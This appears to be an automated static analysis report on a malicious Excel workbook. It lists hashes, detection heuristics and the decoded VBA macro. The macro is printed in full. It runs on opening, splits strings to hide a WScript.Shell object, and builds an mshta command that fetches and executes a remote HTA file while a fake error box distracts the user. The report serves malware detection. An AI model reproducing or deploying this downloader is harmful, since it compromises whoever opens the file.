Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f9f8626c4177ae22…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 13.6 KB
Created: 2021-04-07 13:16:33 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-04-25
MD5: 4fe99bdbc23306052bf28cf130a654b9
SHA-1: 600b6d0c2888a6437c8b423c97e31d02519c9f01
SHA-256: f9f8626c4177ae2255a8ce087f38b08e57cd3f54061bfb484367130ec943462f
Risk score: 128

Heuristics (4)

  • VBA project inside OOXML (severity: medium; 3 related findings; ID: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Dangerous API name reassembled from split string literals (severity: critical; ID: OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set meinkonhun = GetObject("" + "n" + "e" + "w" + ":" + "F93" + "5" + "D" + "C" + "2" + "2" + "-" + "1" + "C" + "F" + "0-1" + "1" + "D" + "0" + "-" + "A" + "D" + "B" + "9" + "-" + "00C04" + "FD" + "5" + "8" + "A" + "0" + "B")
  • GetObject call (severity: high; ID: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script
    Set meinkonhun = GetObject("" + "n" + "e" + "w" + ":" + "F93" + "5" + "D" + "C" + "2" + "2" + "-" + "1" + "C" + "F" + "0-1" + "1" + "D" + "0" + "-" + "A" + "D" + "B" + "9" + "-" + "00C04" + "FD" + "5" + "8" + "A" + "0" + "B")
  • Workbook_Open macro (severity: low; ID: OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1572 bytes
SHA-256: 61b1bde5a9e4c9457f0a13942fc3aa69e27b8d67a7b0c8843686f461179f13da
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub asds()

End Sub

Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function X() As String
X = "M"
End Function
Function Y() As String
Y = "s"
End Function
Function Z() As String
Z = "H"
End Function
Function D() As String
D = "T"
End Function
Function E() As String
E = "a"
End Function
Function L() As String
L = "p"
End Function
Function K() As String
K = "diamantesviagens.com.br/"
End Function
Function T() As String
T = "VirusEmHta.mp3"
End Function
Function F() As String
F = " H" + D + D + L + "://" + K + T
End Function
Function pings() As String
pings = X + Y + Z + D + E + F
End Function
Private Sub Workbook_Open()
Set meinkonhun = GetObject("" + "n" + "e" + "w" + ":" + "F93" + "5" + "D" + "C" + "2" + "2" + "-" + "1" + "C" + "F" + "0-1" + "1" + "D" + "0" + "-" + "A" + "D" + "B" + "9" + "-" + "00C04" + "FD" + "5" + "8" + "A" + "0" + "B")
: MsgBox "Microsoft Office not Installed"
: meinkonhun.EXEC pings
End Sub



Attribute VB_Name = "Planilha1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 19456 bytes
SHA-256: dcf440a594d2e2e0b2fda2c3becbb327d6f8be242ff43ba8716f053a39415750